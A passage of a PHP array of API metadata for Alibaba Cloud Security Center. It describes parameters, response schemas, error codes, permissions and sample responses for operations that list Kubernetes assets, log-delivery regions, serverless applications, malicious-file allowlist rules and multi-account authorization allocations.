'rm-uf6t6u05n6g48****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'yztest-l***', 'title' => ''], 'CreatedTime' => ['description' => 'The timestamp when the instance was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1607365213000', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the instance.', 'type' => 'string', 'example' => '1.2.XX.XX', 'title' => ''], 'AlarmStatus' => ['description' => 'Indicates whether security alerts exist for the asset. Valid values:'."\n" .'- **YES**: Security alerts exist.'."\n" .'- **NO**: No security alerts exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'RiskStatus' => ['description' => 'Indicates whether security risks exist for the asset. Valid values:'."\n" .'- **YES**: Security risks exist.'."\n" .'- **NO**: No security risks exist.', 'type' => 'string', 'example' => 'NO', 'title' => ''], 'AssetTypeName' => ['description' => 'The name of the asset type.', 'type' => 'string', 'example' => 'Workload', 'title' => ''], 'AssetSubTypeName' => ['description' => 'The name of the asset subtype.', 'type' => 'string', 'example' => 'Pod', 'title' => ''], 'SecurityInfo' => ['description' => 'The security information of the asset.', 'type' => 'string', 'example' => '{\\"seriousNum\\":0,\\"appNum\\":0,\\"baselineMedium\\":0,\\"remindNum\\":0,\\"imageVulNntf\\":0,\\"cveNum\\":0,\\"vul\\":0,\\"uuid\\":\\"rm-uf6t6u05n6g485o70\\",\\"emgNum\\":0,\\"weakPWNum\\":0,\\"imageMaliciousFileRemind\\":0,\\"imageBaselineMedium\\":0,\\"laterVulCount\\":0,\\"cmsNum\\":0,\\"imageMaliciousFileSerious\\":0,\\"agentlessMalicious\\":0,\\"suspNum\\":0,\\"imageBaselineHigh\\":0,\\"asapVulCount\\":0,\\"imageVulLater\\":0,\\"agentlessAll\\":0,\\"sysNum\\":0,\\"containerLater\\":0,\\"containerSuspicious\\":0,\\"imageBaselineNum\\":0,\\"newSuspicious\\":0,\\"nntfVulCount\\":0,\\"scaNum\\":0,\\"containerNntf\\":0,\\"health\\":0,\\"trojan\\":0,\\"suspicious\\":0,\\"imageMaliciousFileSuspicious\\":0,\\"containerRemind\\":0,\\"baselineLow\\":0,\\"imageVulAsap\\":0,\\"imageBaselineLow\\":0,\\"containerAsap\\":0,\\"agentlessBaseline\\":0,\\"agentlessVulSca\\":0,\\"agentlessVulCve\\":0,\\"containerSerious\\":0,\\"baselineHigh\\":0,\\"account\\":0,\\"baselineNum\\":6}', 'title' => ''], 'Tags' => [ 'description' => 'The list of resource tags.', 'type' => 'array', 'items' => ['description' => 'The resource tag.', 'type' => 'string', 'example' => 'AI', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'AccountIdNotExist', 'errorMessage' => 'AccountId not exist', 'description' => ''], ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query kubernetes assets', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListKspmInstances', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Success\\": true,\\n \\"RequestId\\": \\"7532B7EE-7CE7-5F4D-BF04-B12447DDCAE1\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 55,\\n \\"Count\\": 4\\n },\\n \\"Instances\\": [\\n {\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"Vendor\\": 200,\\n \\"AssetType\\": 1,\\n \\"AssetSubType\\": \\"1\\",\\n \\"InstanceId\\": \\"rm-uf6t6u05n6g48****\\",\\n \\"InstanceName\\": \\"yztest-l***\\",\\n \\"CreatedTime\\": 1607365213000,\\n \\"InternetIp\\": \\"1.2.XX.XX\\",\\n \\"AlarmStatus\\": \\"NO\\",\\n \\"RiskStatus\\": \\"NO\\",\\n \\"AssetTypeName\\": \\"Workload\\",\\n \\"AssetSubTypeName\\": \\"Pod\\",\\n \\"SecurityInfo\\": \\"{\\\\\\\\\\\\\\"seriousNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"appNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"remindNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cveNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"vul\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"uuid\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"rm-uf6t6u05n6g485o70\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"emgNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"weakPWNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineMedium\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"laterVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"cmsNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessMalicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"asapVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessAll\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"sysNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerLater\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"newSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"nntfVulCount\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"scaNum\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerNntf\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"health\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"trojan\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"suspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageMaliciousFileSuspicious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerRemind\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageVulAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"imageBaselineLow\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerAsap\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessBaseline\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulSca\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"agentlessVulCve\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"containerSerious\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineHigh\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"account\\\\\\\\\\\\\\":0,\\\\\\\\\\\\\\"baselineNum\\\\\\\\\\\\\\":6}\\",\\n \\"Tags\\": [\\n \\"AI\\"\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'ListLogShipperRegions' => [ 'summary' => 'Queries the regions supported for log delivery in pay-as-you-go mode.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '139433', 'abilityTreeNodes' => ['FEATUREsasA2G5MU'], ], 'parameters' => [], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for this request. You can use it to troubleshoot issues.', 'type' => 'string', 'example' => 'F9C4DE22-D242-5ABA-87EC-325ECBDC****', 'title' => ''], 'LogShipperRegionList' => [ 'description' => 'The list of regions supported for log delivery.', 'type' => 'array', 'items' => [ 'description' => 'The region supported for log delivery.', 'type' => 'object', 'properties' => [ 'RegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query regions supported for log delivery in pay-as-you-go mode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListLogShipperRegions'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListLogShipperRegions', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F9C4DE22-D242-5ABA-87EC-325ECBDC****\\",\\n \\"LogShipperRegionList\\": [\\n {\\n \\"RegionId\\": \\"cn-shanghai\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListMachineApps' => [ 'summary' => 'Queries the Serverless Application Engine (SAE) applications of a serverless instance.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '227217', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'AppRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ResourceDirectoryUid', 'in' => 'query', 'schema' => ['description' => 'The UID of the resource directory.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123456', 'title' => ''], ], [ 'name' => 'AppId', 'in' => 'query', 'schema' => ['description' => 'The SAE application ID.', 'type' => 'string', 'required' => false, 'example' => '5b41f4bf-349f-4263-89b1-9234c034****', 'title' => ''], ], [ 'name' => 'AppName', 'in' => 'query', 'schema' => ['description' => 'The SAE application name.', 'type' => 'string', 'required' => false, 'example' => 'agent-commprice-shop', 'title' => ''], ], [ 'name' => 'AuthVersion', 'in' => 'query', 'schema' => ['description' => 'The authorization version of the asset. Valid values:'."\n" .'- **6**: Anti-virus Edition'."\n" .'- **5**: Premium Edition'."\n" .'- **3**: Enterprise Edition'."\n" .'- **7**: Ultimate Edition'."\n" .'- **10**: value-added service Edition.', 'type' => 'string', 'required' => false, 'example' => '7', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'AppList' => [ 'description' => 'The list of applications.', 'type' => 'array', 'items' => [ 'description' => 'The list of applications.', 'type' => 'object', 'properties' => [ 'AppId' => ['description' => 'The SAE application ID.', 'type' => 'string', 'example' => '5b41f4bf-349f-4263-89b1-9234c034****', 'title' => ''], 'AppName' => ['description' => 'The SAE application name.', 'type' => 'string', 'example' => 'app-ubuntu', 'title' => ''], 'AppRegionId' => ['description' => 'The region ID.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information of the query result.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '263', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '028CF634-5268-5660-9575-48C9ED6B****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query SAE applications of a serverless instance', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMachineApps'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeMachineAppPage', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"AppList\\": [\\n {\\n \\"AppId\\": \\"5b41f4bf-349f-4263-89b1-9234c034****\\",\\n \\"AppName\\": \\"app-ubuntu\\",\\n \\"AppRegionId\\": \\"cn-hangzhou\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 263\\n },\\n \\"RequestId\\": \\"028CF634-5268-5660-9575-48C9ED6B****\\"\\n}","type":"json"}]', ], 'ListMaliciousFileWhitelistConfigs' => [ 'summary' => 'Queries the list of allowlist rules for agentless sensitive file detection alerts.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '184430', 'abilityTreeNodes' => ['FEATUREsasNB8R24'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Source', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The business source. This parameter can be left empty. Default value: agentless.', 'type' => 'string', 'required' => false, 'example' => 'agentless'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to return. Minimum value: 1. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return per page in a paging query. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'EventName', 'in' => 'query', 'schema' => ['description' => 'The alerting name. Valid values:'."\n" .'- ALL: all Alarm Metric values.', 'type' => 'string', 'required' => false, 'example' => 'ALL', 'title' => ''], ], [ 'name' => 'IdList', 'in' => 'query', 'schema' => ['description' => 'The event ID.'."\n" ."\n" .'>This field is deprecated.>.', 'type' => 'integer', 'format' => 'int64', 'deprecated' => true, 'required' => false, 'example' => '123', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PageResult', 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of allowlist rules for agentless file detection alerts.', 'type' => 'array', 'items' => [ 'description' => 'The allowlist rule for agentless file detection alerts.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['title' => '', 'description' => 'The creation time.', 'type' => 'string', 'example' => '1691719662000'], 'GmtModified' => ['title' => '', 'description' => 'The modification time.', 'type' => 'string', 'example' => '1691719662000'], 'EventName' => ['title' => '', 'description' => 'The alerting name. Valid values:'."\n" .'- ALL: all Alarm Metric values.', 'type' => 'string', 'example' => 'ALL'], 'Field' => ['title' => '', 'description' => 'The field added to the allowlist.', 'type' => 'string', 'example' => 'fileMd5'], 'FieldValue' => ['title' => '', 'description' => 'The value of the field added to the allowlist.', 'type' => 'string', 'example' => 'b2cf9747ee49d8d9b105cf16e078cc16'], 'Operator' => ['title' => '', 'description' => 'The operator used for rule evaluation. Valid values:'."\n" .'- strEqual: string equals.', 'type' => 'string', 'example' => 'strEqual'], 'TargetValue' => ['title' => '', 'description' => 'The target scope. Valid values:'."\n" .'- ALL: all assets'."\n" .'- Other values: the asset scope key selected by the asset selection component.', 'type' => 'string', 'example' => 'ALL'], 'TargetType' => ['title' => '', 'description' => 'The target type. Valid values:'."\n" .'- ALL: all assets'."\n" .'- SELECTION_KEY: assets selected by the asset selection component.', 'type' => 'string', 'example' => 'ALL'], 'Count' => ['title' => '', 'description' => 'The number of assets for which the rule takes effect.'."\n" .'>This field has a value only when targetType is set to SELECTION_KEY.', 'type' => 'string', 'example' => 'ALL'], 'Source' => ['title' => '', 'description' => 'The business source. Valid values:'."\n" .'- agentless: agentless detection.', 'type' => 'string', 'example' => 'agentless'], 'Id' => ['description' => 'The ID of the alert allowlist rule.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], 'Remark' => ['title' => '', 'description' => 'The remarks.', 'type' => 'string', 'example' => 'test'], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The additional information.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'F5CF78A7-30AA-59DB-847F-13EE3AE7****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code of the request.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ['errorCode' => 'UnknownError', 'errorMessage' => 'UnknownError', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query allowlist rules for agentless sensitive file detection alerts', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListMaliciousFileWhitelistConfigs'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListMaliciousFileWhitelistConfigs', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'MaliciousFileWhitelistConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:maliciousfilewhitelistconfig/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"GmtCreate\\": \\"1691719662000\\",\\n \\"GmtModified\\": \\"1691719662000\\",\\n \\"EventName\\": \\"ALL\\",\\n \\"Field\\": \\"fileMd5\\",\\n \\"FieldValue\\": \\"b2cf9747ee49d8d9b105cf16e078cc16\\",\\n \\"Operator\\": \\"strEqual\\",\\n \\"TargetValue\\": \\"ALL\\",\\n \\"TargetType\\": \\"ALL\\",\\n \\"Count\\": \\"ALL\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Id\\": 1,\\n \\"Remark\\": \\"test\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 29,\\n \\"Count\\": 9\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"F5CF78A7-30AA-59DB-847F-13EE3AE7****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListMultiUserInstances' => [ 'summary' => 'Query Multi-Account Authorization Allocation List', 'path' => '', 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasFVYNUW'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'MaxResults', 'in' => 'query', 'schema' => ['description' => 'Number of items per page in a paginated query. The maximum value is 100. Range: 10 - 100, default value: 10.', 'type' => 'integer', 'format' => 'int32', 'maximum' => '200', 'minimum' => '1', 'default' => '100', 'required' => false, 'example' => '50', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'Used for paginated queries. Leave it empty for the first request, and fill in the NextToken value returned from the previous response for subsequent requests.', 'type' => 'string', 'required' => false, 'example' => 'CAESGgoSChAKDGNvbXBsZXRlVGltZRABCgQiAggAGAAiQAoJAB4SwmEAAAAACjMDLgAAADFTNzMyZDMwMzAzMDM0NzY3YTZjNjI3NjZmNmU3MjcxNjk3NDY5MzY3MjY4****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => 'Schema of Response', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => 'Id of the request', 'description' => 'The ID of this call request, which is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '88F2A6CD-E500-5038-B992-0107B99AA88C'], 'SaleInstanceList' => [ 'description' => 'Details of member accounts.', 'type' => 'array', 'items' => [ 'description' => 'Details of member accounts.', 'type' => 'object', 'properties' => [ 'AliUid' => ['description' => 'UID of the member account.', 'type' => 'integer', 'format' => 'int64', 'example' => '103784262032', 'title' => ''], 'InstanceId' => ['description' => 'Cloud Security Center instance ID purchased by the member account.', 'type' => 'string', 'example' => 'api-service-spec', 'title' => ''], 'InstancePurchaseType' => ['description' => 'Instance purchase type. Values:'."\n" ."\n" .'- **0**: Self-purchased.'."\n" ."\n" .'- **1**: Allocated.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'Version' => ['description' => 'Version of the Cloud Security Center for the member account. Values:'."\n" ."\n" .'- **1**: Free Edition'."\n" ."\n" .'- **3**: Enterprise Edition'."\n" ."\n" .'- **5**: Advanced Edition'."\n" ."\n" .'- **6**: Anti-Virus Edition'."\n" ."\n" .'- **7**: Flagship Edition'."\n" ."\n" .'- **8**: Multiple Versions'."\n" ."\n" .'- **10**: Only Purchased Value-Added Services', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Status' => ['description' => 'Status of the member account instance. Values:'."\n" ."\n" .'- **1**: Active.'."\n" ."\n" .'- **2**: Inactive.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'SlsCapacity' => [ 'description' => 'Log storage capacity usage of the member account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated log storage capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used log storage capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AntiRansomwareCapacity' => [ 'description' => 'Anti-ransomware capacity usage of the member account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated anti-ransomware capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'Used' => ['description' => 'Used anti-ransomware capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RaspCapacity' => [ 'description' => 'Member account RASP (Runtime Application Self-Protection) usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated RASP capacity. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used RASP capacity. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'CspmCapacity' => [ 'description' => 'Member account CSPM (Cloud Security Posture Management) scan usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated CSPM scan count. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used CSPM scan count. Unit: per month.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ThreatAnalysisCapacity' => [ 'description' => 'Member account threat analysis capacity usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used threat analysis capacity. Unit: GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ThreatAnalysisFlow' => [ 'description' => 'Member account threat analysis and response log ingestion traffic usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated threat analysis and response log ingestion traffic. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used threat analysis and response log ingestion traffic. Unit: GB/day.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'ImageScanCapacity' => [ 'description' => 'Member account image scanning authorization usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Allocated image scanning authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Used image scanning authorizations.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'WebLockCapacity' => [ 'description' => 'Member account web lock (anti-tampering) authorization usage.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Number of web tamper-proof authorizations allocated.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Number of web tamper-proof authorizations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'HoneypotCapacity' => [ 'description' => 'Usage details of honeypot authorizations for the member account.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'Number of honeypot authorizations allocated.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], 'Used' => ['description' => 'Number of honeypot authorizations used.', 'type' => 'integer', 'format' => 'int64', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'SdkCapacity' => [ 'description' => 'Usage details of malicious file detection SDK authorizations for the member account.', 'type' 